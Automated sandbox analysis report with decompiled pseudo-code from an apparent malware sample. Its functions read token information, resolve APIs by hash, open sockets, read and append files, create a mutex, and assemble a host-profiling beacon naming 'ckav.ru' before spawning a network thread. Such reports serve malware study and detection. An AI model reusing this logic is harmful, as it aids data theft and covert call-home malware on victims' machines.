                          					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                          					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                          					__eflags = _t30;
                          					if(_t30 == 0) {
                          						_t36 = E00402B7C(_v12);
                          						_v16 = _t36;
                          						__eflags = _t36;
                          						if(_t36 != 0) {
                          							_t14 =  &_v8; // 0x414449, executed
                          							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                          								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                          								__eflags = _t40;
                          								if(__eflags != 0) {
                          									_t67 = E00405B6F(__eflags, L"%s", _t49);
                          								}
                          							}
                          							E00402BAB(_v16);
                          						}
                          					}
                          					__eflags = _v8;
                          					if(_v8 != 0) {
                          						E00403C40(_v8); // executed
                          					}
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E00402BAB(_t49);
                          					}
                          					_t31 = _v20;
                          					__eflags = _t31;
                          					if(_t31 != 0) {
                          						E00402BAB(_t31);
                          					}
                          					return _t67;
                          				}
                          				_t44 = GetLastError();
                          				if(_t44 == 0x3f0) {
                          					E004060AC();
                          					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          					_t3 =  &_v8; // 0x414449
                          					_t46 =  *_t45(_t44, 8, _t3);
                          					__eflags = _t46;
                          					if(_t46 == 0) {
                          						goto L2;
                          					}
                          					goto L4;
                          				}
                          				L2:
                          				return 0;
                          			}


























                          0x004061c3
                          0x004061cb
                          0x004061cd
                          0x004061d0
                          0x004061de
                          0x004061e0
                          0x004061e5
                          0x004061e9
                          0x004061eb
                          0x004061ed
                          0x004061f2
                          0x0040622a
                          0x00406230
                          0x00406235
                          0x00406239
                          0x0040623b
                          0x00406244
                          0x00406249
                          0x00406249
                          0x0040624c
                          0x00406253
                          0x00406256
                          0x00406258
                          0x00406261
                          0x00406266
                          0x00406266
                          0x00406270
                          0x00406273
                          0x00406276
                          0x0040627b
                          0x0040627e
                          0x0040628c
                          0x0040628e
                          0x00406290
                          0x00406295
                          0x0040629a
                          0x0040629e
                          0x004062a0
                          0x004062ac
                          0x004062af
                          0x004062b7
                          0x004062b9
                          0x004062c9
                          0x004062e0
                          0x004062e2
                          0x004062e4
                          0x004062f3
                          0x004062f3
                          0x004062e4
                          0x004062f8
                          0x004062fd
                          0x004062a0
                          0x004062fe
                          0x00406302
                          0x00406307
                          0x0040630c
                          0x0040630d
                          0x0040630f
                          0x00406312
                          0x00406317
                          0x00406318
                          0x0040631c
                          0x0040631e
                          0x00406321
                          0x00406326
                          0x00000000
                          0x00406327
                          0x004061f4
                          0x004061ff
                          0x00406208
                          0x00406218
                          0x0040621d
                          0x00406224
                          0x00406226
                          0x00406228
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406228
                          0x00406201
                          0x00000000

                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                          • _wmemset.LIBCMT ref: 00406244
                          • _wmemset.LIBCMT ref: 00406261
                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wmemset$ErrorInformationLastToken
                          • String ID: IDA$IDA
                          • API String ID: 487585393-2020647798
                          • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 551 404ec7-404ec9 542->551 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->551 554 404ecd-404ece 550->554 551->554 554->539
                          C-Code - Quality: 37%
                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void _v40;
                          				void* _t23;
                          				signed int _t24;
                          				signed int* _t25;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t33;
                          				signed int _t41;
                          				void* _t42;
                          				signed int* _t43;
                          
                          				_v8 = _v8 & 0x00000000;
                          				_t33 = 8;
                          				memset( &_v40, 0, _t33 << 2);
                          				_v32 = 1;
                          				_t23 =  &_v40;
                          				_v28 = 6;
                          				_v36 = 2;
                          				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                          				if(_t23 == 0) {
                          					_t24 = E00402B7C(4);
                          					_t43 = _t24;
                          					_t31 = _t30 | 0xffffffff;
                          					 *_t43 = _t31;
                          					_t41 = _v8;
                          					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                          					 *_t43 = _t24;
                          					if(_t24 != _t31) {
                          						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                          						if(_t24 == _t31) {
                          							E00404DE5(_t24,  *_t43);
                          							 *_t43 = _t31;
                          						}
                          						__imp__freeaddrinfo(_v8);
                          						if( *_t43 != _t31) {
                          							_t25 = _t43;
                          							goto L10;
                          						} else {
                          							E00402BAB(_t43);
                          							L8:
                          							_t25 = 0;
                          							L10:
                          							return _t25;
                          						}
                          					}
                          					E00402BAB(_t43);
                          					__imp__freeaddrinfo(_v8);
                          					goto L8;
                          				}
                          				return 0;
                          			}

















                          0x00404e1d
                          0x00404e26
                          0x00404e2a
                          0x00404e2f
                          0x00404e37
                          0x00404e3a
                          0x00404e45
                          0x00404e4f
                          0x00404e57
                          0x00404e61
                          0x00404e66
                          0x00404e68
                          0x00404e6c
                          0x00404e6e
                          0x00404e7a
                          0x00404e80
                          0x00404e84
                          0x00404e9f
                          0x00404ea7
                          0x00404eab
                          0x00404eb1
                          0x00404eb1
                          0x00404eb6
                          0x00404ebe
                          0x00404ecb
                          0x00000000
                          0x00404ec0
                          0x00404ec1
                          0x00404ec7
                          0x00404ec7
                          0x00404ecd
                          0x00000000
                          0x00404ece
                          0x00404ebe
                          0x00404e87
                          0x00404e90
                          0x00000000
                          0x00404e90
                          0x00000000

                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                          C-Code - Quality: 74%
                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                          				struct _SECURITY_ATTRIBUTES* _v8;
                          				char _v12;
                          				long _v16;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t16;
                          				intOrPtr* _t25;
                          				long* _t28;
                          				void* _t30;
                          				int _t32;
                          				intOrPtr* _t33;
                          				void* _t35;
                          				void* _t42;
                          				intOrPtr _t43;
                          				long _t44;
                          				struct _OVERLAPPED* _t46;
                          
                          				_t46 = 0;
                          				_t35 = 0;
                          				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                          				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                          				_t42 = _t16;
                          				_v8 = _t42;
                          				if(_t42 == 0xffffffff) {
                          					__eflags = _a12;
                          					if(_a12 == 0) {
                          						L10:
                          						return _t35;
                          					}
                          					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                          					__eflags = _t43;
                          					if(_t43 == 0) {
                          						goto L10;
                          					}
                          					_push(0);
                          					__eflags = E00403C59(_a4, _t43);
                          					if(__eflags != 0) {
                          						_v8 = 0;
                          						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                          						_push(_t43);
                          						 *_a8 = _v8;
                          						E00403D44();
                          					}
                          					E00402BAB(_t43);
                          					return _t46;
                          				}
                          				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                          				_t44 =  *_t25(_t42,  &_v12);
                          				if(_v12 != 0 || _t44 > 0x40000000) {
                          					L8:
                          					_t45 = _v8;
                          					goto L9;
                          				} else {
                          					_t28 = _a8;
                          					if(_t28 != 0) {
                          						 *_t28 = _t44;
                          					}
                          					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                          					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                          					_t35 = _t30;
                          					if(_t35 == 0) {
                          						goto L8;
                          					} else {
                          						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                          						_t45 = _v8;
                          						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                          						if(_t32 == 0) {
                          							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                          							 *_t33(_t35, _t46, 0x8000);
                          							_t35 = _t46;
                          						}
                          						L9:
                          						E00403C40(_t45); // executed
                          						goto L10;
                          					}
                          				}
                          			}



















                          0x004040c4
                          0x004040ce
                          0x004040d0
                          0x004040e8
                          0x004040ea
                          0x004040ec
                          0x004040f2
                          0x0040418d
                          0x00404190
                          0x00404184
                          0x00000000
                          0x00404184
                          0x004041a0
                          0x004041a5
                          0x004041a7
                          0x00000000
                          0x00000000
                          0x004041a9
                          0x004041b6
                          0x004041b8
                          0x004041be
                          0x004041cb
                          0x004041d0
                          0x004041d1
                          0x004041d3
                          0x004041d8
                          0x004041dc
                          0x00000000
                          0x004041e2
                          0x00404100
                          0x0040410c
                          0x00404111
                          0x0040417a
                          0x0040417a
                          0x00000000
                          0x0040411b
                          0x0040411b
                          0x00404120
                          0x00404122
                          0x00404122
                          0x0040412c
                          0x0040413a
                          0x0040413c
                          0x00404140
                          0x00000000
                          0x00404142
                          0x0040414a
                          0x00404155
                          0x0040415a
                          0x0040415e
                          0x00404168
                          0x00404174
                          0x00404176
                          0x00404176
                          0x0040417d
                          0x0040417e
                          0x00000000
                          0x00404183
                          0x00404140

                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AllocCreateReadVirtual
                          • String ID: .tmp
                          • API String ID: 3585551309-2986845003
                          • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                          • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00413866(void* __eflags) {
                          				short _v6;
                          				short _v8;
                          				short _v10;
                          				short _v12;
                          				short _v14;
                          				short _v16;
                          				short _v18;
                          				short _v20;
                          				short _v22;
                          				char _v24;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				short _v40;
                          				short _v42;
                          				short _v44;
                          				short _v46;
                          				char _v48;
                          				short _v52;
                          				short _v54;
                          				short _v56;
                          				short _v58;
                          				short _v60;
                          				short _v62;
                          				short _v64;
                          				short _v66;
                          				short _v68;
                          				short _v70;
                          				short _v72;
                          				short _v74;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t38;
                          				short _t43;
                          				short _t44;
                          				short _t45;
                          				short _t46;
                          				short _t47;
                          				short _t48;
                          				short _t50;
                          				short _t51;
                          				short _t52;
                          				short _t54;
                          				short _t55;
                          				intOrPtr* _t57;
                          				intOrPtr* _t59;
                          				intOrPtr* _t61;
                          				void* _t63;
                          				WCHAR* _t65;
                          				long _t68;
                          				void* _t75;
                          				short _t76;
                          				short _t78;
                          				short _t83;
                          				short _t84;
                          				short _t85;
                          
                          				E00402C6C(_t38);
                          				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                          				SetErrorMode(3); // executed
                          				_t43 = 0x4f;
                          				_v76 = _t43;
                          				_t44 = 0x4c;
                          				_v74 = _t44;
                          				_t45 = 0x45;
                          				_v72 = _t45;
                          				_t46 = 0x41;
                          				_v70 = _t46;
                          				_t47 = 0x55;
                          				_v68 = _t47;
                          				_t48 = 0x54;
                          				_t76 = 0x33;
                          				_t84 = 0x32;
                          				_t83 = 0x2e;
                          				_t78 = 0x64;
                          				_t85 = 0x6c;
                          				_v66 = _t48;
                          				_v52 = 0;
                          				_t50 = 0x77;
                          				_v48 = _t50;
                          				_t51 = 0x73;
                          				_v46 = _t51;
                          				_t52 = 0x5f;
                          				_v42 = _t52;
                          				_v28 = 0;
                          				_t54 = 0x6f;
                          				_v24 = _t54;
                          				_t55 = 0x65;
                          				_v20 = _t55;
                          				_v64 = _t76;
                          				_v62 = _t84;
                          				_v60 = _t83;
                          				_v58 = _t78;
                          				_v56 = _t85;
                          				_v54 = _t85;
                          				_v44 = _t84;
                          				_v40 = _t76;
                          				_v38 = _t84;
                          				_v36 = _t83;
                          				_v34 = _t78;
                          				_v32 = _t85;
                          				_v30 = _t85;
                          				_v22 = _t85;
                          				_v18 = _t76;
                          				_v16 = _t84;
                          				_v14 = _t83;
                          				_v12 = _t78;
                          				_v10 = _t85;
                          				_v8 = _t85;
                          				_v6 = 0;
                          				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t57( &_v76);
                          				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t59( &_v48);
                          				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				_t81 =  &_v24;
                          				 *_t61( &_v24); // executed
                          				_t63 = E00414059(); // executed
                          				if(_t63 != 0) {
                          					_t65 = E00413D97(0);
                          					E004031E5(0, 0, 0xcf167df4, 0, 0);
                          					CreateMutexW(0, 1, _t65); // executed
                          					_t68 = GetLastError();
                          					_t92 = _t68 - 0xb7;
                          					if(_t68 == 0xb7) {
                          						E00413B81(0);
                          						_pop(_t81); // executed
                          					}
                          					E00413003(_t92); // executed
                          					E00412B2E(_t92); // executed
                          					E00412D31(_t81, _t84); // executed
                          					E00413B3F();
                          					E00413B81(0);
                          					 *0x49fdd0 = 1;
                          				}
                          				return 0;
                          			}































































                          0x0041386f
                          0x0041387e
                          0x00413885
                          0x00413889
                          0x0041388c
                          0x00413890
                          0x00413893
                          0x00413897
                          0x0041389a
                          0x0041389e
                          0x004138a1
                          0x004138a5
                          0x004138a8
                          0x004138ac
                          0x004138af
                          0x004138b2
                          0x004138b5
                          0x004138b8
                          0x004138bb
                          0x004138bc
                          0x004138c4
                          0x004138c8
                          0x004138cb
                          0x004138cf
                          0x004138d2
                          0x004138d6
                          0x004138d7
                          0x004138df
                          0x004138e3
                          0x004138e4
                          0x004138ea
                          0x004138eb
                          0x004138f1
                          0x004138f5
                          0x004138f9
                          0x004138fd
                          0x00413901
                          0x00413905
                          0x00413909
                          0x0041390d
                          0x00413911
                          0x00413915
                          0x00413919
                          0x0041391d
                          0x00413921
                          0x00413925
                          0x00413929
                          0x0041392d
                          0x00413931
                          0x00413935
                          0x00413939
                          0x0041393d
                          0x00413941
                          0x00413950
                          0x00413959
                          0x0041395f
                          0x00413968
                          0x0041396e
                          0x00413973
                          0x00413977
                          0x00413979
                          0x00413980
                          0x00413982
                          0x00413991
                          0x0041399c
                          0x0041399e
                          0x004139a4
                          0x004139a9
                          0x004139ac
                          0x004139b1
                          0x004139b1
                          0x004139b2
                          0x004139b7
                          0x004139bc
                          0x004139c1
                          0x004139c7
                          0x004139cd
                          0x004139cd
                          0x004139db

                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                          				long _v8;
                          				void* _t7;
                          				long _t10;
                          				void* _t21;
                          				struct _OVERLAPPED* _t24;
                          
                          				_t14 = __ebx;
                          				_t24 = 0;
                          				_v8 = 0;
                          				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                          				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                          				_t21 = _t7;
                          				if(_t21 != 0xffffffff) {
                          					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                          					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                          					if(_t10 != 0xffffffff) {
                          						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                          						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                          						_t24 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_t21); // executed
                          				}
                          				return _t24;
                          			}








                          0x004042cf
                          0x004042d5
                          0x004042df
                          0x004042e2
                          0x004042f9
                          0x004042fb
                          0x00404300
                          0x0040430a
                          0x00404314
                          0x00404319
                          0x00404323
                          0x00404334
                          0x0040433b
                          0x0040433b
                          0x0040433f
                          0x00404344
                          0x0040434c

                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreatePointerWrite
                          • String ID:
                          • API String ID: 3672724799-0
                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 34%
                          			E00412D31(void* __ecx, void* __edi) {
                          				long _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				char _v40;
                          				void* __ebx;
                          				intOrPtr* _t10;
                          				void* _t11;
                          				void* _t25;
                          				void* _t26;
                          				void* _t27;
                          				void* _t35;
                          				void* _t53;
                          				char* _t57;
                          				void* _t58;
                          				void* _t61;
                          				void* _t64;
                          				void* _t65;
                          				intOrPtr* _t66;
                          				void* _t67;
                          				void* _t68;
                          				void* _t69;
                          				void* _t70;
                          				void* _t71;
                          				void* _t72;
                          				void* _t73;
                          
                          				_t53 = __ecx;
                          				_t10 =  *0x49fde0;
                          				_t68 = _t67 - 0x24;
                          				 *0x49fddc = 0x927c0;
                          				 *0x49fde4 = 0;
                          				_t75 = _t10;
                          				if(_t10 != 0) {
                          					L16:
                          					_push(1);
                          					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                          					_t61 = _t11;
                          					_t68 = _t68 + 0xc;
                          					if(_t61 != 0) {
                          						E004031E5(0, 0, 0xfcae4162, 0, 0);
                          						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                          					}
                          					L004067C4(0xea60); // executed
                          					_pop(_t53);
                          				} else {
                          					_push(__edi);
                          					 *0x49fde0 = E004056BF(0x2bc);
                          					E00413DB7(_t53, _t75,  &_v40);
                          					_t57 =  &_v24;
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					E004058D4( *0x49fde0, 0x12);
                          					E004058D4( *0x49fde0, 0x28);
                          					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                          					_t69 = _t68 + 0x28;
                          					_t64 = E0040632F();
                          					_push(0);
                          					_push(1);
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t70 = _t69 + 0x10;
                          					} else {
                          						_push(_t64);
                          						_push( *0x49fde0);
                          						E00405872();
                          						E00402BAB(_t64);
                          						_t70 = _t69 + 0x14;
                          					}
                          					_t58 = E00406130(_t57);
                          					_push(0);
                          					_push(1);
                          					_t77 = _t64;
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						_t25 = E00405872();
                          						_t71 = _t70 + 0x10; // executed
                          					} else {
                          						_push(_t58);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t25 = E00402BAB(_t58);
                          						_t71 = _t70 + 0x14;
                          					}
                          					_t26 = E004061C3(_t25, 0, _t77); // executed
                          					_t65 = _t26;
                          					_push(0);
                          					_push(1);
                          					if(_t65 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						_t27 = E00405872();
                          						_t72 = _t71 + 0x10;
                          					} else {
                          						_push(_t65);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t27 = E00402BAB(_t65);
                          						_t72 = _t71 + 0x14;
                          					}
                          					_t66 = E00406189(_t27);
                          					_t79 = _t66;
                          					if(_t66 == 0) {
                          						E00405781( *0x49fde0, 0);
                          						E00405781( *0x49fde0, 0);
                          						_t73 = _t72 + 0x10;
                          					} else {
                          						E00405781( *0x49fde0,  *_t66);
                          						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                          						E00402BAB(_t66);
                          						_t73 = _t72 + 0x14;
                          					}
                          					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                          					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                          					_t35 = E0040642C(_t79); // executed
                          					E004058D4( *0x49fde0, _t35);
                          					E004058D4( *0x49fde0, _v24);
                          					E004058D4( *0x49fde0, _v20);
                          					E004058D4( *0x49fde0, _v16);
                          					E004058D4( *0x49fde0, _v12);
                          					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                          					_t68 = _t73 + 0x48;
                          				}
                          				_t80 =  *0x49fde4;
                          				if( *0x49fde4 == 0) {
                          					_t10 =  *0x49fde0;
                          					goto L16;
                          				}
                          				return E00405695(_t53,  *0x49fde0);
                          			}






























                          0x00412d31
                          0x00412d34
                          0x00412d39
                          0x00412d3c
                          0x00412d49
                          0x00412d50
                          0x00412d52
                          0x00412f24
                          0x00412f24
                          0x00412f2b
                          0x00412f30
                          0x00412f32
                          0x00412f37
                          0x00412f41
                          0x00412f53
                          0x00412f53
                          0x00412f5b
                          0x00412f60
                          0x00412d58
                          0x00412d58
                          0x00412d63
                          0x00412d6c
                          0x00412d73
                          0x00412d7e
                          0x00412d7f
                          0x00412d80
                          0x00412d81
                          0x00412d82
                          0x00412d8f
                          0x00412da1
                          0x00412da6
                          0x00412dae
                          0x00412db0
                          0x00412db1
                          0x00412db5
                          0x00412dce
                          0x00412dcf
                          0x00412dd5
                          0x00412dda
                          0x00412db7
                          0x00412db7
                          0x00412db8
                          0x00412dbe
                          0x00412dc4
                          0x00412dc9
                          0x00412dc9
                          0x00412de2
                          0x00412de4
                          0x00412de5
                          0x00412de7
                          0x00412de9
                          0x00412e02
                          0x00412e03
                          0x00412e09
                          0x00412e0e
                          0x00412deb
                          0x00412deb
                          0x00412dec
                          0x00412df2
                          0x00412df8
                          0x00412dfd
                          0x00412dfd
                          0x00412e11
                          0x00412e17
                          0x00412e19
                          0x00412e1a
                          0x00412e1e
                          0x00412e37
                          0x00412e38
                          0x00412e3e
                          0x00412e43
                          0x00412e20
                          0x00412e20
                          0x00412e21
                          0x00412e27
                          0x00412e2d
                          0x00412e32
                          0x00412e32
                          0x00412e4b
                          0x00412e4d
                          0x00412e4f
                          0x00412e7e
                          0x00412e8a
                          0x00412e8f
                          0x00412e51
                          0x00412e59
                          0x00412e67
                          0x00412e6d
                          0x00412e72
                          0x00412e72
                          0x00412e9e
                          0x00412eaf
                          0x00412eb4
                          0x00412ec0
                          0x00412ece
                          0x00412edc
                          0x00412eea
                          0x00412ef8
                          0x00412f0f
                          0x00412f14
                          0x00412f14
                          0x00412f17
                          0x00412f1d
                          0x00412f1f
                          0x00000000
                          0x00412f1f
                          0x00412f74

                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
